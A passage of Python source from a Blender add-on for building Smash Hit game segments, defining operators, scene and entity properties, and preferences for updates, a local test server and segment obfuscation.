\"Permanently lock APK with Segstrate\"\n\t\n\tagreement: BoolProperty(\n\t\tname = \"I understand the conseqences of locking my APK permantently.\",\n\t\tdescription = \"Locking your APK will make you unable to import or export any segments to the APK. Please only use this when you are making a copy of the APK that you want to distribute.\",\n\t\tdefault = False,\n\t)\n\t\n\tdef execute(self, context):\n\t\tif (self.agreement):\n\t\t\tcontext.window.cursor_set('WAIT')\n\t\t\tsegstrate.setup_apk(self.filepath, False)\n\t\t\tcontext.window.cursor_set('DEFAULT')\n\t\telse:\n\t\t\tbutil.show_message(\"Segstrate error\", \"The agreement has not been accepted and the protection has not been preformed.\")\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_rebake_meshes(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tRebake many meshes from a folder\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.rebake_meshes\"\n\tbl_label = \"Rebake multipule meshes\"\n\t\n\tdef execute(self, context):\n\t\tassets = butil.find_apk()\n\t\t\n\t\tcontext.window.cursor_set('WAIT')\n\t\textra_tools.rebake_all(self.filepath, f\"{assets}/templates.xml.mp3\" if assets else None)\n\t\tcontext.window.cursor_set('DEFAULT')\n\t\t\n\t\treturn {\"FINISHED\"}\n\n## EDITOR\n## The following things are more related to the editor and are not specifically\n## for exporting or importing segments.\n\nclass sh_SceneProperties(PropertyGroup):\n\t\"\"\"\n\tSegment (scene) properties\n\t\"\"\"\n\t\n\tsh_level: StringProperty(\n\t\tname = \"Level\",\n\t\tdescription = \"The name of the checkpoint that this segment belongs to.\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_room: StringProperty(\n\t\tname = \"Room\",\n\t\tdescription = \"The name of the room that this segment belongs to.\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_segment: StringProperty(\n\t\tname = \"Segment\",\n\t\tdescription = \"The name of this segment\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_len: FloatVectorProperty(\n\t\tname = \"Size\",\n\t\tdescription = \"Segment size (Width, Height, Depth). Hint: Last paramater changes the length (depth) of the segment\",\n\t\tsubtype = \"XYZ\",\n\t\tdefault = (12.0, 10.0, 8.0), \n\t\tmin = 0.0,\n\t\tmax = 1024.0,\n\t)\n\t\n\tsh_auto_length: BoolProperty(\n\t\tname = \"Auto length\",\n\t\tdescription = \"Automatically determine the length of the segment based on the furthest object from the origin.\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_box_bake_mode: EnumProperty(\n\t\tname = \"Box bake mode\",\n\t\tdescription = \"This will control how the boxes should be exported. Hover over each option for an explation of how it works\",\n\t\titems = [\n\t\t\t('Mesh', \"Mesh\", \"Exports a .mesh file alongside the segment for showing visible box geometry\"),\n\t\t\t('StoneHack', \"Obstacle\", \"Adds a custom obstacle named 'stone' for every box that attempts to simulate stone. Only colour is supported: there are no textures\"),\n\t\t\t('None', \"None\", \"Don't do anything related to baking stone; only exports the raw segment data\"),\n\t\t],\n\t\tdefault = \"Mesh\"\n\t)\n\t\n\tsh_template: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"The template paramater that is passed for the entire segment\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_default_template: StringProperty(\n\t\tname = \"Default template\",\n\t\tdescription = \"The base name of the template to use when no template is specified for an entity. Format: boxes 🡒 '{basename}', obstacles 🡒 '{basename}_glass', obstacles starting with 'score' 🡒 '{basename}_st', segment 🡒 '{basename}_s'\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_softshadow: FloatProperty(\n\t\tname = \"Soft shadow\",\n\t\tdescription = \"Opacity of soft shadow on dynamic objects\",\n\t\tdefault = 0.6,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_vrmultiply: FloatProperty(\n\t\tname = \"Segment strech\",\n\t\tdescription = \"This option tries to strech the segment's depth to make more time between obstacles. The intent is to allow it to be played in Smash Hit VR easier and without modifications to the segment\",\n\t\tdefault = 1.0,\n\t\tmin = 0.75,\n\t\tmax = 4.0,\n\t)\n\t\n\tsh_light_left: FloatProperty(\n\t\tname = \"Left\",\n\t\tdescription = \"Light going on to the left side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_right: FloatProperty(\n\t\tname = \"Right\",\n\t\tdescription = \"Light going on to the right side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_top: FloatProperty(\n\t\tname = \"Top\",\n\t\tdescription = \"Light going on to the top side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_bottom: FloatProperty(\n\t\tname = \"Bottom\",\n\t\tdescription = \"Light going on to the bottom side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_front: FloatProperty(\n\t\tname = \"Front\",\n\t\tdescription = \"Light going on to the front side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_light_back: FloatProperty(\n\t\tname = \"Back\",\n\t\tdescription = \"Light going on to the back side of boxes\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_menu_segment: BoolProperty(\n\t\tname = \"Menu segment mode\",\n\t\tdescription = \"Treats the segment like it will appear on the main menu. Bakes faces that cannot be seen by the player\",\n\t\tdefault = False\n\t)\n\t\n\tsh_ambient_occlusion: BoolProperty(\n\t\tname = \"Ambient occlusion\",\n\t\tdescription = \"Enables ambient occlusion (per-vertex lighting)\",\n\t\tdefault = True\n\t)\n\t\n\tsh_lighting: BoolProperty(\n\t\tname = \"Lighting\",\n\t\tdescription = \"Enables some lighting features when baking the mesh\",\n\t\tdefault = False\n\t)\n\t\n\tsh_drm_disallow_import: BoolProperty(\n\t\tname = \"Disallow import\",\n\t\tdescription = \"This will disallow importing the exported segment. It can very easily be bypassed, but might prevent a casual user from editing your segment without asking. Please use this feature wisely and consider providing Blender files for people who ask nicely\",\n\t\tdefault = False\n\t)\n\t\n\tsh_lighting_ambient: FloatVectorProperty(\n\t\tname = \"Ambient\",\n\t\tdescription = \"Colour and intensity of the ambient light\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (0.0, 0.0, 0.0), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_stone_obstacle_name: StringProperty(\n\t\tname = \"Stone obstacle name\",\n\t\tdescription = \"Name of the obstacle to use for stone\",\n\t\tdefault = \"stone\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_legacy_colour_model: BoolProperty(\n\t\tname = \"Legacy colour model\",\n\t\tdescription = \"Uses the colour inheritance model from SHBT v0.9x, which can avoid extra effort when using the stone hack\",\n\t\tdefault = False\n\t)\n\t\n\tsh_legacy_colour_default: FloatVectorProperty(\n\t\tname = \"Default colour\",\n\t\tdescription = \"The default colour for all (non-visible marked) boxes when using the legacy colour model\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_fog_colour_top: FloatVectorProperty(\n\t\tname = \"Top fog\",\n\t\tdescription = \"Fog colour for quick test. While this does use the fogcolor xml attribute, this property cannot be inherited from templates or used like a normal property\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_fog_colour_bottom: FloatVectorProperty(\n\t\tname = \"Bottom fog\",\n\t\tdescription = \"Fog colour for quick test. While this does use the fogcolor xml attribute, this property cannot be inherited from templates or used like a normal property\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (0.0, 0.0, 0.0),\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_music: StringProperty(\n\t\tname = \"Music track\",\n\t\tdescription = \"Name of the music file to play in quick test. The track must be in the apk. Default is to choose a random track\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_reverb: StringProperty(\n\t\tname = \"Reverb\",\n\t\tdescription = \"Reverb parameters in quick test. No one knows what these do ‾\\\\_o_/‾\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_echo: StringProperty(\n\t\tname = \"Echo\",\n\t\tdescription = \"Echo parameters in quick test. No one knows what these do ‾\\\\_o_/‾\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_particles: EnumProperty(\n\t\tname = \"Particles\",\n\t\tdescription = \"The particles that appear when looking at the stage in quick test\",\n\t\titems = (\n\t\t\t(\"None\", \"None\", \"\"),\n\t\t\t(\"starfield\", \"Star feild\", \"\"),\n\t\t\t(\"lowrising\", \"Low rising 1\", \"\"),\n\t\t\t(\"lowrising2\", \"Low rising 2\", \"\"),\n\t\t\t(\"sidesrising\", \"Sides rising\", \"\"),\n\t\t\t(\"fallinglite\", \"Falling lite\", \"\"),\n\t\t\t(\"bubbles\", \"Bubbles\", \"\"),\n\t\t\t(\"dustyfalling\", \"Dusty falling\", \"\"),\n\t\t),\n\t\tdefault = \"None\",\n\t)\n\t\n\tsh_difficulty: FloatProperty(\n\t\tname = \"Difficulty\",\n\t\tdescription = \"Sets the difficulty level of the room\",\n\t\tdefault = 0.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_gravity: FloatProperty(\n\t\tname = \"Gravity\",\n\t\tdescription = \"The amount of gravity to use in quick test\",\n\t\tdefault = 1.0,\n\t\tmin = -1.0,\n\t\tmax = 3.0,\n\t)\n\t\n\tsh_extra_code: StringProperty(\n\t\tname = \"Extra code\",\n\t\tdescription = \"Extra code to include the in room file. Multipule statements can be seperated by ';'.\",\n\t\tdefault = \"\",\n\t)\n\t\n\tsh_room_length: IntProperty(\n\t\tname = \"Room length\",\n\t\tdescription = \"The length of the room in quick test\",\n\t\tdefault = 90,\n\t\tmin = 50,\n\t\tmax = 250,\n\t)\n\n# Object (box/obstacle/powerup/decal/water) properties\n\nclass sh_EntityProperties(PropertyGroup):\n\t\n\tsh_type: EnumProperty(\n\t\tname = \"Kind\",\n\t\tdescription = \"The kind of object that the currently selected object should be treated as.\",\n\t\titems = [\n\t\t\t('BOX', \"Box\", \"\", \"MESH_CUBE\", 0),\n\t\t\t('OBS', \"Obstacle\", \"\", \"NODE_MATERIAL\", 1),\n\t\t\t('DEC', \"Decal\", \"\", \"TEXTURE\", 2),\n\t\t\t('POW', \"Power-up\", \"\", \"LIGHT_SUN\", 3),\n\t\t\t('WAT', \"Water\", \"\", \"MATFLUID\", 4),\n\t\t],\n\t\tdefault = \"BOX\"\n\t)\n\t\n\tsh_template: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"The template for the obstacle/box (see templates.xml), remember that this can be easily overridden per obstacle/box\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_use_chooser: BoolProperty(\n\t\tname = \"Use obstacle chooser\",\n\t\tdescription = \"Use the obstacle chooser instead of typing the name by hand\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_obstacle: StringProperty(\n\t\tname = \"Obstacle\",\n\t\tdescription = \"Type of obstacle to be used (as a file name string)\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_obstacle_chooser: EnumProperty(\n\t\tname = \"Obstacle\",\n\t\tdescription = \"Type of obstacle to be used (pick a name)\",\n\t\titems = obstacle_db.OBSTACLES,\n\t\tdefault = \"scoretop\",\n\t)\n\t\n\tsh_powerup: EnumProperty(\n\t\tname = \"Power-up\",\n\t\tdescription = \"The type of power-up that will appear\",\n\t\titems = [\n\t\t\t('ballfrenzy', \"Ball Frenzy\", \"Allows the player infinite balls for some time\", \"LIGHTPROBE_GRID\", 0),\n\t\t\t('slowmotion', \"Slow Motion\", \"Slows down the game\", \"MOD_TIME\", 1),\n\t\t\t('nitroballs', \"Nitro Balls\", \"Turns balls into exposlives for a short period of time\", \"PROP_OFF\", 2),\n\t\t\tNone,\n\t\t\t('barrel', \"Barrel\", \"Creates a large explosion which breaks glass (lefover from beta versions)\", \"EXPERIMENTAL\", 3),\n\t\t\tNone,\n\t\t\t('multiball', \"Multi-ball*\", \"*Does not work anymore. Old power up that would enable five-ball multiball\"),\n\t\t\t('freebie', \"Freebie*\", \"*Does not work anymore. Old power up found in binary strings but no known usage\"),\n\t\t\t('antigravity', \"Anti-gravity*\", \"*Does not work anymore. Old power up that probably would have reversed gravity\"),\n\t\t\t('rewind', \"Rewind*\", \"*Does not work anymore. Old power up that probably would have reversed time\"),\n\t\t\t('sheild', \"Sheild*\", \"*Does not work anymore. Old power up that probably would have protected the player\"),\n\t\t\t('homing', \"Homing*\", \"*Does not work anymore. Old power up that probably would have homed to obstacles\"),\n\t\t\t('life', \"Life*\", \"*Does not work anymore. Old power up that gave the player a life\"),\n\t\t\t('balls', \"Balls*\", \"*Does not work anymore. Old power up that gave the player ten balls\"),\n\t\t],\n\t\tdefault = \"ballfrenzy\",\n\t)\n\t\n\tsh_export: BoolProperty(\n\t\tname = \"Export object\",\n\t\tdescription = \"If the object should be exported to the XML at all. Change \\\"hidden\\\" if you'd like it to be hidden but still present in the exported file\",\n\t\tdefault = True,\n\t)\n\t\n\tsh_hidden: BoolProperty(\n\t\tname = \"Hidden\",\n\t\tdescription = \"Controls if the entity will show in the official level editor. This is basically useless but included for completeness\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_mode: EnumProperty(\n\t\tname = \"Mode\",\n\t\toptions = {\"ENUM_FLAG\"},\n\t\tdescription = \"The game modes in which this obstacle should appear\",\n\t\titems = [\n\t\t\t('training', \"Training\", \"Obstacle should appear in Training mode\", 1),\n\t\t\t('classic', \"Classic and Zen\", \"Obstacle should appear in Classic and Zen modes\", 2),\n\t\t\t('expert', \"Mayhem\", \"Obstacle should appear in Mayhem mode\", 4),\n\t\t\t('versus', \"Versus\", \"Obstacle should appear in Versus mode\", 16),\n\t\t\t('coop', \"Co-op\", \"Obstacle should appear in Co-op mode\", 32),\n\t\t],\n\t\tdefault = {'training', 'classic', 'expert', 'versus', 'coop'},\n\t)\n\t\n\tsh_difficulty: FloatVectorProperty(\n\t\tname = \"Difficulty\",\n\t\tdescription = \"The range of difficulty values for which this entity will appear. Difficulty is different than game modes, and is mainly used in Endless Mode to include or exclude obstacle based on a value set per room (using mgSetDifficulty) indicating how hard the room should be. As an example, this is used to exclude crystals in later levels in the Endless mode without creating entirely new segments\",\n\t\tdefault = (0.0, 1.0),\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t\tsize = 2,\n\t)\n\t\n\t##################\n\t# Mesh properties\n\t##################\n\t\n\tsh_visible: BoolProperty(\n\t\tname = \"Visible\",\n\t\tdescription = \"If the box will appear in the exported mesh\",\n\t\tdefault = True\n\t)\n\t\n\tsh_use_multitile: BoolProperty(\n\t\tname = \"Tile per-side\",\n\t\tdescription = \"Specifiy a colour for each parallel pair of faces on the box\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_tile: IntProperty(\n\t\tname = \"Tile\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tile1: IntProperty(\n\t\tname = \"Right Left\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tile2: IntProperty(\n\t\tname = \"Top Bottom\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tile3: IntProperty(\n\t\tname = \"Front Back\",\n\t\tdescription = \"The texture that will appear on the surface of the box or decal\",\n\t\tdefault = 0,\n\t\tmin = 0,\n\t\tmax = 63\n\t)\n\t\n\tsh_tilerot: IntVectorProperty(\n\t\tname = \"Tile orientation\",\n\t\tdescription = \"Orientation of the tile, where 0 is facing up\",\n\t\tdefault = (0, 0, 0), \n\t\tmin = 0,\n\t\tmax = 3,\n\t) \n\t\n\tsh_tilesize: FloatVectorProperty(\n\t\tname = \"Tile size\",\n\t\tdescription = \"The appearing size of the tiles on the box when exported. In RightLeft, TopBottom, FrontBack\",\n\t\tdefault = (1.0, 1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 128.0,\n\t\tsize = 3\n\t) \n\t\n\t########################\n\t# Back to normal things\n\t########################\n\t\n\tsh_decal: IntProperty(\n\t\tname = \"Decal\",\n\t\tdescription = \"The image ID for the decal (negitive numbers are doors)\",\n\t\tdefault = 1,\n\t\tmin = -4,\n\t\tmax = 63\n\t)\n\t\n\tsh_reflective: BoolProperty(\n\t\tname = \"Reflective\",\n\t\tdescription = \"If this box should show reflections\",\n\t\tdefault = False\n\t)\n\t\n\t#############\n\t# Paramaters\n\t#############\n\t\n\tsh_param0: StringProperty(\n\t\tname = \"param0\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param1: StringProperty(\n\t\tname = \"param1\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param2: StringProperty(\n\t\tname = \"param2\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param3: StringProperty(\n\t\tname = \"param3\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param4: StringProperty(\n\t\tname = \"param4\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param5: StringProperty(\n\t\tname = \"param5\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param6: StringProperty(\n\t\tname = \"param6\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param7: StringProperty(\n\t\tname = \"param7\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param8: StringProperty(\n\t\tname = \"param8\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param9: StringProperty(\n\t\tname = \"param9\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param10: StringProperty(\n\t\tname = \"param10\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tsh_param11: StringProperty(\n\t\tname = \"param11\",\n\t\tdescription = \"Parameter which is given to the obstacle when spawned\",\n\t\tdefault = \"\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\t###############\n\t# Other values\n\t###############\n\t\n\tsh_havetint: BoolProperty(\n\t\tname = \"Decal colourisation\",\n\t\tdescription = \"Changes the tint (colourisation) of the decal\",\n\t\tdefault = False\n\t)\n\t\n\tsh_use_multitint: BoolProperty(\n\t\tname = \"Colour per-side\",\n\t\tdescription = \"Specifiy a colour for each parallel pair of faces on the box\",\n\t\tdefault = False,\n\t)\n\t\n\tsh_tint: FloatVectorProperty(\n\t\tname = \"Colour\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_tint1: FloatVectorProperty(\n\t\tname = \"Right Left\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_tint2: FloatVectorProperty(\n\t\tname = \"Top Bottom\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_tint3: FloatVectorProperty(\n\t\tname = \"Front Back\",\n\t\tdescription = \"The colour to be used for tinting, colouring and mesh data\",\n\t\tsubtype = \"COLOR_GAMMA\",\n\t\tdefault = (1.0, 1.0, 1.0, 1.0), \n\t\tsize = 4,\n\t\tmin = 0.0,\n\t\tmax = 1.0\n\t)\n\t\n\tsh_blend: FloatProperty(\n\t\tname = \"Blend mode\",\n\t\tdescription = \"How the colour of the decal and the existing colour will be blended. 1 = normal, 0 = added or numbers in between\",\n\t\tdefault = 1.0,\n\t\tmin = 0.0,\n\t\tmax = 1.0,\n\t)\n\t\n\tsh_size: FloatVectorProperty(\n\t\tname = \"Size\",\n\t\tdescription = \"The size of the object when exported\",\n\t\tdefault = (1.0, 1.0), \n\t\tmin = 0.0,\n\t\tmax = 256.0,\n\t\tsize = 2,\n\t)\n\t\n\tsh_glow: FloatProperty(\n\t\tname = \"Glow\",\n\t\tdescription = \"The intensity of the light in \\\"watts\\\"; zero if this isn't a light\",\n\t\tdefault = 0.0,\n\t\tmin = 0.0,\n\t\tmax = 1000.0,\n\t)\n\nclass sh_AddonPreferences(AddonPreferences):\n\tbl_idname = \"shatter\"\n\t\n\t## General ##\n\tdefault_assets_path: StringProperty(\n\t\tname = \"Default assets path\",\n\t\tdescription = \"The path to your Smash Hit assets folder, if you want to override the default automatic APK finding\",\n\t\tsubtype = \"DIR_PATH\",\n\t\tdefault = \"\",\n\t)\n\t\n\tenable_segment_warnings: BoolProperty(\n\t\tname = \"Enable export and import warnings\",\n\t\tdescription = \"Export and import warnings can warn you about possible issues that might result in odd or unexpected behaviour in Smash Hit\",\n\t\tdefault = True,\n\t)\n\t\n\tresolve_templates: BoolProperty(\n\t\tname = \"Resolve templates at export time\",\n\t\tdescription = \"Solves templates when a segment is exported. This avoids the need for adding used templates to templates.xml, but makes the filesize larger and the XML file less readable\",\n\t\tdefault = False,\n\t)\n\t\n\tcompact_ui: BoolProperty(\n\t\tname = \"Compact UI mode\",\n\t\tdescription = \"Avoids drawing any excessive UI elements that would make the UI larger than needed\",\n\t\tdefault = False,\n\t)\n\t\n\t## Network ##\n\tenable_update_notifier: BoolProperty(\n\t\tname = \"Enable update checking\",\n\t\tdescription = \"Enables checking for updates. This will try to contact github, which may pose a privacy risk\",\n\t\tdefault = True,\n\t)\n\t\n\tenable_auto_update: BoolProperty(\n\t\tname = \"Enable automatic updates\",\n\t\tdescription = \"Automatically downloads and installs the newest version of the addon\",\n\t\tdefault = True,\n\t)\n\t\n\tupdater_channel: EnumProperty(\n\t\tname = \"Update freqency\",\n\t\tdescription = \"This controls how frequently you will recieve updates, tweaks and new features. Faster updates might be buggier and break your workflow but contain better features, while slower updates will give a better exprience without newer features\",\n\t\titems = [\n\t\t\t('stable', \"Fast\", \"Contains new updates and features as soon as they are available, but might also break sometimes.\"),\n\t\t\t('updatertest', \"Updater test\", \"A testing channel. This doesn't get real updates.\"),\n\t\t],\n\t\tdefault = \"stable\",\n\t)\n\t\n\tenable_quick_test_server: BoolProperty(\n\t\tname = \"Enable quick test server\",\n\t\tdescription = \"Enables the quick test server. This will create a local http server using python, which might pose a security risk\",\n\t\tdefault = True,\n\t)\n\t\n\tenable_bad_check: BoolProperty(\n\t\tname = \"Other network features\",\n\t\tdescription = \"Enables other network features. Some features might not be available if you don't enable this\",\n\t\tdefault = True,\n\t)\n\t\n\t## Protection options ##\n\tforce_disallow_import: BoolProperty(\n\t\tname = \"Always disallow import\",\n\t\tdescription = \"Enabling this option will force every segment to have the \\\"disallow import\\\" flag set, even if you did not configure it via the obstacle panel. Please note that marking segments with this flag does not prevent someone bypassing it\",\n\t\tdefault = False,\n\t)\n\t\n\tsegment_encrypt: BoolProperty(\n\t\tname = \"Obfuscate exported segments (alpha)\",\n\t\tdescription = \"This will obfuscate segments using a very basic implementation of the XTEA-CTR cipher. THIS IS NOT INTENDED TO BE SECURE OR CONFIDENTIAL IN ANY WAY. Note: In the future there may be mods that allow loading encrypted segments and providing some protection against copying, but this does not exist yet and so this is only for development right now\",\n\t\tdefault = False,\n\t)\n\t\n\t# Yes, I technically imply that this is not a \"password\" even though it is.\n\t# But really I don't want ppl to use their one password for everything (ugh)\n\t# in this. Maybe it would be better to switch to a keyfile of some kind?\n\tsegment_encrypt_password: StringProperty(\n\t\tname = \"Keyphrase\",\n\t\tdescription = \"The unique keyphrase to obfuscate segments with. This should be a mix of random symbols, similar to a password, but does not need to be memorable\",\n\t\t# subtype = \"PASSWORD\",\n\t\tdefault = \"\",\n\t)\n\t\n\t## Other shatter stuff ##\n\tuid: StringProperty(\n\t\tname = \"uid\",\n\t\tdescription = \"user id\",\n\t\tsubtype = \"PASSWORD\",\n\t\tdefault = \"\",\n\t)\n\t\n\tdef draw(self, context):\n\t\tmain = self.layout\n\t\t\n\t\tui = butil.UIDrawingHelper(context, self.layout, self)\n\t\t\n\t\tui.region(\"PREFERENCES\", \"General options\")\n\t\tui.prop(\"default_assets_path\")\n\t\tui.prop(\"enable_segment_warnings\")\n\t\tui.prop(\"resolve_templates\")\n\t\tui.prop(\"compact_ui\")\n\t\tui.end()\n\t\t\n\t\tui.region(\"WORLD\", \"Network features\")\n\t\tui.label(f\"Your unique user ID: {self.uid}\")\n\t\tui.prop(\"enable_quick_test_server\")\n\t\tui.prop(\"enable_update_notifier\")\n\t\tui.prop(\"updater_channel\")\n\t\t\n\t\tif (self.enable_update_notifier):\n\t\t\tui.prop(\"enable_auto_update\")\n\t\t\t\n\t\t\tif (self.enable_auto_update):\n\t\t\t\tui.warn(\"Please note: If a bad update is released, it might break Shatter. Be careful!\")\n\t\t\n\t\tui.prop(\"enable_bad_check\")\n\t\tui.end()\n\t\t\n\t\tui.region(\"LOCKED\", \"Protection\")\n\t\tui.prop(\"force_disallow_import\")\n\t\tui.prop(\"segment_encrypt\")\n\t\t\n\t\tif (self.segment_encrypt):\n\t\t\tui.prop(\"segment_encrypt_password\")\n\t\t\tui.op(\"shatter.obfuscation_randomise_keyphrase\")\n\t\t\tui.warn(\"Segment obfuscation is not supported ingame. Developers only!\")\n\t\t\n\t\tui.end()\n\t\t\n\t\tui.region(\"INFO\", \"About Shatter\")\n\t\tui.op(\"shatter.open_credits_page\")\n\t\tui.op(\"shatter.open_privacy_page\")\n\t\t\n\t\tif (g_got_ricked):\n\t\t\tui.region(\"INFO\", \"Trolled !!!\", new = False)\n\t\t\tui.label(\"Anyway, I hope you are doing well in life :)\")\n\t\t\tui.label(\"-- Knot126\")\n\t\t\tui.end()\n\t\t\n\t\tui.end()\n\nclass RandomiseKeyphrase(Operator):\n\tbl_idname = \"shatter.obfuscation_randomise_keyphrase\"\n\tbl_label = \"Randomise keyphrase\"\n\t\n\tdef execute(self, context):\n\t\tp = get_prefs()\n\t\tp.segment_encrypt_password = util.randpw()\n\t\treturn {\"FINISHED\"}\n\nclass sh_SegmentPanel(Panel):\n\tbl_label = \"Smash Hit\"\n\tbl_idname = \"OBJECT_PT_segment_panel\"\n\tbl_space_type = \"VIEW_3D\"\n\tbl_region_type = \"UI\"\n\tbl_category = \"Scene\"\n\t\n\t@classmethod\n\tdef poll(self, context):\n\t\treturn True\n\t\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\t\tscene = context.scene\n\t\tsh_properties = scene.sh_properties\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Location\", icon = \"NODE\")\n\t\tsub.prop(sh_properties, \"sh_level\")\n\t\tsub.prop(sh_properties, \"sh_room\")\n\t\tsub.prop(sh_properties, \"sh_segment\")\n\t\t\n\t\tsub = layout.box()\n\t\tsub.label(text = \"Segment data\", icon = \"SCENE_DATA\")\n\t\tsub.prop(sh_properties, \"sh_auto_length\", toggle = 1)\n\t\tif (not sh_properties.sh_auto_length):\n\t\t\tsub.prop(sh_properties, \"sh_len\")\n\t\tsub.prop(sh_properties, \"sh_box_bake_mode\")\n\t\tsub.prop(sh_properties, \"sh_template\")\n\t\tsub.prop(sh_properties, \"sh_default_template\")\n\t\tsub.prop(sh_properties, \"sh_softshadow\")\n\t\tsub.prop(sh_properties, \"sh_vrmultiply\")\n\t\t\n\t\tbake_mode = sh_properties.sh_box_bake_mode\n\t\t\n\t\tif (bake_mode == 